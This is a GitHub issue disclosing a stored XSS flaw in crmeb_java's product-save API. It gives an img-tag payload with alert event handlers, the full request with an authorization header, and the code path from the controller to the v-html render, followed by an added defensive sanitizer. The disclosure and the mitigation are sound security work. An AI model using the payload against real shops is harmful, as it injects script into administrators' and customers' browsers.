crmeb / crmeb_java

Java mall, free and open source: the CRMEB mall, Java edition. SpringBoot + Maven + Swagger + Mybatis Plus + Redis + Uniapp + Vue + elementUI, including mobile, mini-program, PC admin backend and API. Modules for products, users, shopping cart, orders, points, coupons, marketing, balance, permissions, roles, system settings, combined data, drag-and-drop forms and more, greatly reducing the cost of secondary development.
Apache License 2.0

There is a stored XSS vulnerability in the /api/admin/store/product/save interface of the crmeb_java system #12

Open Mechoy opened 1 year ago

Mechoy commented 1 year ago

[Suggested description] A stored XSS vulnerability exists in crmeb_java <=1.3.4. Failure to filter or validate parameters effectively results in stored XSS.

[Vulnerability Type] Stored XSS

[Vendor of Product] https://github.com/crmeb/crmeb_java

[Affected Product Code Base] <=1.3.4

[Affected Component] /api/admin/store/product/save

[Attack Type] Remote

[Vulnerability details] Payload:

<img src=\"1111\" alt=\"2222\" width=\"33\" height=\"33\" onclick=\"alert`333`\" onerror=alert(2)/>

Get the request message of the /api/admin/store/product/save interface.

POST /api/admin/store/product/save HTTP/2
Host: api.java.crmeb.net
Content-Length: 1213
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/plain, */*
Content-Type: application/json
Authori-Zation: 213ff6ff1ca24ae78f8263bd7ad0ea6c
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://admin.java.crmeb.net
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://admin.java.crmeb.net/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","sliderImages":["https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg"],"videoLink":"","sliderImage":"[\"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg\"]","storeName":"3333","storeInfo":"2132131","keyword":"1111","cateIds":[972,1185],"cateId":"972,1185","unitName":"1111","sort":1,"giveIntegral":1,"ficti":2,"isShow":false,"isBenefit":false,"isNew":false,"isGood":false,"isHot":true,"isBest":false,"tempId":94,"attrValue":[{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","price":0,"cost":0,"otPrice":0,"stock":0,"barCode":"","weight":0,"volume":0,"attrValue":"{\"规格\":\"默认\"}"}],"attr":[{"attrName":"规格","attrValues":"默认","id":0}],"selectRule":"","isSub":false,"content":"111","specType":false,"id":0,"couponIds":[],"coupons":[],"activity":["默认","秒杀","砍价","拼团"]}

The content parameter has a stored XSS vulnerability. Insert the payload and send the request packet. [screenshot: crmeb_java_2_1] Find the added product and enter the product details page, then click the inserted img tag to trigger the vulnerability. [screenshot: crmeb_java_2_2] There you can see it!

[Impact Code execution] true

[Cause of vulnerability] com.zbkj.admin.controller.StoreProductController, line 77. The save() method of storeProductService is called on line 77 of this controller. [screenshot: crmeb_java_2_3] Follow this method into com.zbkj.service.service.impl.StoreProductServiceImpl: on line 339, the value of the content parameter from the request packet is saved to the database. Now to the front end: in crmeb_java\admin\src\views\store\creatStore\index.vue, line 296, v-html is used to render the obtained content value. It is known that v-html treats the obtained content as HTML code and renders it. [screenshot: crmeb_java_2_4] The cause of this vulnerability is that there is no legality or security check on user data.

The end, thanks!
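As an added example (not code from crmeb_java or from the reporter), a defensive allow-list sanitizer in JavaScript for the product `content` field, of the kind that could run server-side before the value is stored at line 339 or client-side before the v-html at line 296. The tag list, attribute list and sample inputs are assumptions; the report's payload is used as constructed input, un-escaped from its JSON form.

```javascript
// Added example, not crmeb_java's own code: allow-list sanitizer for the
// product `content` HTML. ALLOWED/VOID_TAGS/URL_ATTRS are assumed policy.
const ALLOWED = {
  p: [], br: [], b: [], i: [], strong: [], em: [], ul: [], ol: [], li: [],
  img: ["src", "alt", "width", "height"],
  a: ["href", "title"],
};
const VOID_TAGS = new Set(["br", "img"]);
const URL_ATTRS = new Set(["src", "href"]);

// Only absolute http(s) or root-relative URLs pass. Bare relative values are
// rejected on purpose: entity-encoded schemes such as "javascript&colon;..."
// would otherwise slip through and be decoded by the browser.
function isSafeUrl(value) {
  return /^(?:https?:\/\/|\/)/i.test(value);
}

const escapeText = (s) => s.replace(/</g, "&lt;").replace(/>/g, "&gt;");
const escapeAttr = (s) =>
  s.replace(/"/g, "&quot;").replace(/</g, "&lt;").replace(/>/g, "&gt;");

// Rebuild one tag from parsed parts, keeping only allow-listed attributes.
// Event handlers (onclick, onerror, ...) are never in the list, so they vanish.
function rebuildTag(closing, name, rawAttrs) {
  const allowedAttrs = ALLOWED[name];
  if (allowedAttrs === undefined) return "";            // unknown tag: dropped
  if (closing) return VOID_TAGS.has(name) ? "" : `</${name}>`;
  const attrRe = /([a-zA-Z][\w:-]*)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  let attrs = "", m;
  while ((m = attrRe.exec(rawAttrs)) !== null) {
    const attr = m[1].toLowerCase();
    if (!allowedAttrs.includes(attr)) continue;
    let value = m[2] === undefined ? "" : m[2];
    if (/^["']/.test(value)) value = value.slice(1, -1);  // strip quotes
    if (URL_ATTRS.has(attr) && !isSafeUrl(value)) continue;
    attrs += ` ${attr}="${escapeAttr(value)}"`;
  }
  return `<${name}${attrs}>`;
}

// Walk the markup: text between tags is escaped, tags are rebuilt or dropped.
function sanitizeProductHtml(html) {
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  let out = "", last = 0, m;
  while ((m = tagRe.exec(html)) !== null) {
    out += escapeText(html.slice(last, m.index));
    out += rebuildTag(m[1] === "/", m[2].toLowerCase(), m[3]);
    last = m.index + m[0].length;
  }
  return out + escapeText(html.slice(last));
}

// Constructed sample: the report's payload, un-escaped from its JSON form.
const PAYLOAD = '<img src="1111" alt="2222" width="33" height="33" onclick="alert`333`" onerror=alert(2)/>';
console.log(sanitizeProductHtml(PAYLOAD)); // → <img alt="2222" width="33" height="33">
```

The payload's relative src "1111" is dropped together with both event handlers, while an absolute image URL is kept. For production use, a maintained sanitizer such as DOMPurify is the better choice than this minimal version.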